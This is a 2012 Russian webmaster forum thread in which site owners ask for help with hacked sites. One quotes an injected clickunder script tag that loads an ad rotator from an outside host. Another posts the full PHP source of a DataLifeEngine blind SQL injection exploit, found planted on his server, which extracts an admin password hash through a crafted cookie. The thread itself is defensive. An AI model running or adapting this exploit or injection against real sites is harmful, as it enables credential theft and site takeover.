Помогите найти код!

Сообщений: 61 Регистрация: Окт 2010

16 Марта 2012 13:13

Здравствуйте, уважаемые Форумчане! Уже неоднократно обращалась к вам за помощью и знаю, что здесь много отзывчивых людей. Суть проблемы такова: буквально прошло пару дней, как обнаружила на сайте наличие кликандера, кто-то вероятно взломал сайт и установил его. При нажатии на категорию вылазит сайт velcome-club точка com. Больше ничего вроде не изменилось. После появления этого кода сильно просел трафик. Не могу найти этот код на сайте. Может кто-то подскажет, где можно посмотреть или каким образом его отыскать? Заранее благодарна! Сайт: http://allsofts2009.ucoz.ru/

Изменено: Оксана - 16 Марта 2012 13:19

лилия

Сообщений: 2 Регистрация: Дек 2011

16 Марта 2012 13:33

Спросите на форуме юкоза webanet вам наверняка поможет! smile:)

Оксана

Сообщений: 61 Регистрация: Окт 2010

16 Марта 2012 13:33

Цитата
<script language="javascript" src="http://uno.wt-rotator.biz/?t=rot&noadult=1&pid=49901"></script>

[COLOR=#373737]Данный код случайно не может оказаться этой какой?[/COLOR]

Оксана

Сообщений: 61 Регистрация: Окт 2010

16 Марта 2012 13:36

Спасибо, Лилия! Обязательно спрошу smile:)

paltarasych

Сообщений: 3289 Регистрация: Янв 2011

17 Марта 2012 00:50

Цитата

Оксана пишет:

Цитата
<script language="javascript" src="http://uno.wt-rotator.biz/?t=rot&noadult=1&pid=49901 (http://\"http://uno.wt-rotator.biz/?t=rot&noadult=1&pid=49901\")"></script>

[COLOR=#373737]Данный код случайно не может оказаться этой какой?[/COLOR]

это и есть, код этот от
визард-трафик wt-rotator
визард-банерс wb-rotator

Биржа криптовалюты

Отличный хостинг Webhost1

naribalky

Сообщений: 3196 Регистрация: Апр 2011

17 Марта 2012 10:27

Перенес тему в наиболее подходящий раздел.

Оксана

Сообщений: 61 Регистрация: Окт 2010

17 Марта 2012 11:06

Спасибо огромное! Нашла, удалила. Только не пойму код этот устанавливается только на главной? Вроде все перерыла, нигде больше не увидела. И можно ли как-то защититься от этих взломов?

Number724

Сообщений: 124 Регистрация: Фев 2011

17 Марта 2012 12:02

Цитата
Оксана пишет: защититься от этих взломов?

Смените пароль, установите лицензионный антивирус, не скачивайте кейгены и т.п. приложения, по чаще делайте бэкапы дизайна и всего сайта

Изменено: Number724 - 17 Марта 2012 12:05

Комплексный прогон сайтов ru и en | Новая партнерка: Реклама VK-message от 1000 рублей за 1к кликов

AdvWizard

Сообщений: 71 Регистрация: Янв 2012

19 Марта 2012 19:02

Уважаемая Оксана!Аккаунт злоумышленника забанен в нашей системе. Спасибо, за проявленную бдительность!

WIZARD-FORUM
Выкуп VK Message по 2,25 руб. за клик!

PTS

Сообщений: 42 Регистрация: Мар 2012

#10

20 Марта 2012 12:00

код мог вставить кто-то у кого есть админские права на вход в панель управления сайтом на укозе. код как правило вставляется в шаблон главной страницы

klimatbox.ru

Оксана

Сообщений: 61 Регистрация: Окт 2010

#11

20 Марта 2012 12:24

Доступа ни у кого не было 100%. Не знаю каким образом, но сайт взломали и установили код. Я замечала, что происходит что-то странное, приходилось по несколько раз заходить в админку, но как-то не сильно обращала внимание. А зря!

PTS

Сообщений: 42 Регистрация: Мар 2012

#12

20 Марта 2012 16:25

обязательно меняйте пароль чаще и так, чтобы в пароле были и буквы и цифры. пароли от админки и от аккаунта на том же сайте должны быть разными, ну и свой комп берегите, т.к. если у вас заведтся червь-кейлоггер, то пароль от админки будет самой просто и безобидной потерей в отличии от сугубо личной Вашей информации smile:)

kashin

Сообщений: 5 Регистрация: Окт 2010

#13

20 Марта 2012 20:16

ребята на на сайте файл с названием 111.php и вот с таким содержанием

Код

<html> 
  
        <head> 
                <title>DataLifeEngine Online Mod Exploit Blind SQL Injection</title> 
                <style type="text/css"> 
                        body{ 
                                font-family: Tahoma; 
                                font-size: 12px; 
                                color: #e1e1e1; 
                                background-color: #222; 
                        } 
                </style> 
        </head> 
         
        <body> 
                <center> 
                <form method="post" action="<?php echo $_SERVER['SCRIPT_NAME']?>"> 
                      dle path:<input type="text" name="server" value="localhost/dle/" /> 
                        <br/><br/> 
                       admin id:  <input type="text" name="userid" value="1" /> 
                        <br/><br/> 
                        <input type="submit" /> 
                </form> 
                </center> 
        </body> 
  
</html> 
  
<?php 
if (!empty($_POST)) 
{ 
        $_      = create_function('$error', 'die("$error";'); 
        $userid         = isset($_POST['userid'&#93 ? (int) $_POST['userid'] : null; 
        $server  = isset($_POST['server'&#93 ? $_POST['server'] : null; 
        $alphabet   = array('a', 'b', 'c', 'd', 'e', 'f', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0'); 
        $responce       = null; 
        $password       = null; 
        $curpos  = 1; 
        $alppos     = 0; 
        $flag       = false; 
         
         
        $pathinfo = parse_url($server); 
        if (false === is_array($pathinfo) or empty($pathinfo['host'&#93) { 
                $_('invalid url'); 
        } else { 
                $fsocket = fsockopen($pathinfo['host'], 80) or  
                        $_('hostname is dead'); 
                $request = "GET {$pathinfo['path']} HTTP/1.1\r\n" 
                                 . "Host: {$pathinfo['host']}\r\n" 
                                 . "Cookie: dle_onl_session='underWHAT?!\r\n\r\n"; 
                fwrite($fsocket, $request) or  
                        $_ ('failed to write data to socket'); 
                while ($flag === false){ 
                                        $responce .= fread($fsocket, 128); 
                                        $flag = strpos($responce, '</html>') ? true: false; 
                } 
        $flag = false; 
                if (strpos($responce, 'MySQL Error') > 0){ 
                        while (strlen($password) < 32) 
                        { 
                                $fsocket = fsockopen($pathinfo['host'], 80) or  
                                        $_('hostname is dead');  
                                $responce = null; 
                                $cookie   = "' or 1=if(substring((select password from dle_users where user_id = $userid),$curpos,1)='{$alphabet[$alppos]}',1,(select 1 union select 3))/*"; 
                                $request  = "GET {$pathinfo['path']} HTTP/1.1\r\n" 
                                                  . "Host: {$pathinfo['host']}\r\n" 
                                                  . "Connection: close\r\n" 
                                                  . "Cookie: dle_onl_session=$cookie\r\n\r\n"; 
                                fwrite($fsocket, $request) or  
                                        $_ ('failed to write data to socket'); 
                                $responce = fread($fsocket, 8000); 
                                if (!strpos($responce, 'returns more than 1 row')){ 
                                        $password .= $alphabet[$alppos]; 
                                        $curpos += 1; 
                                        $alppos = 0; 
                                } else { 
                                        $alppos += 1; 
                                } 
                                $flag     = false; 
                                $responce = null; 
                                fclose($fsocket); 
                        } 
                } else { 
            die ('<center><h1>not vulnerable</h1></center>'); 
        } 
                echo "<center><h1>$password</h1></center>";                                
        } 
} 
  
    
?>

скажите что за

Yapy

Сообщений: 583 Регистрация: Дек 2011

#14

21 Марта 2012 00:05

Цитата
kashin пишет: скажите что за

Взлом. Удаляйте.

О сколько нам открытий чудных готовит продвиженья путь:
И Google, сын ошибок трудных, и Yandex, парадоксов друг :)
Дешёвый хостинг для новичков и про

Похожие темы:

06.12.2022 12:48	Помогите убрать ботнет контроллер с сайта
29.10.2022 18:46	Вирусный плагин background-image-cropper (Вордпресс) и файл accesson.php Помогите избавиться
24.03.2021 21:29	Скрипт защиты от копирования. Помогите немного доработать
12.03.2021 21:27	Помогите. Сайт в определенное время отдает ошибку 404
18.09.2018 13:34	Помогите найти вирус

Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)

Новые темы	Объявления	Свободное общение
19:33 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 17:02 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 15:12 Несколько статей хорошо выдаются в Гугле, но отвратительно в Яндексе 13:40 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 11:41 2Index - быстрая индексация страниц сайта и обратных ссылок 09:56 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 23:00 Продвижение по ключам	03:51 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 00:23 CryptoGraph — Анонимный обмен криптовалют без KYC и AML 20:20 Продвижение сайтов 15:49 Продажа аккаунтов HH.RU 15:12 Продам аккаунты Gmail USA IP \| Gmail MIX IP \| Outlook Old 13:55 Современный скрипт обменника электронных валют 13:06 AlwaysMoney - платформа для обмена криптовалют	20:43 Добро пожаловать в цифровой мир... 15:59 Про мясо 23:09 ПП от PMS remote.team - 200$ за команду 13:28 Компьютерная мышь 22:55 Ну что, кто куда деваете свои сайты? 22:34 Используете беспроводные наушники? 22:26 Какой фильм посмотреть сегодня вечером?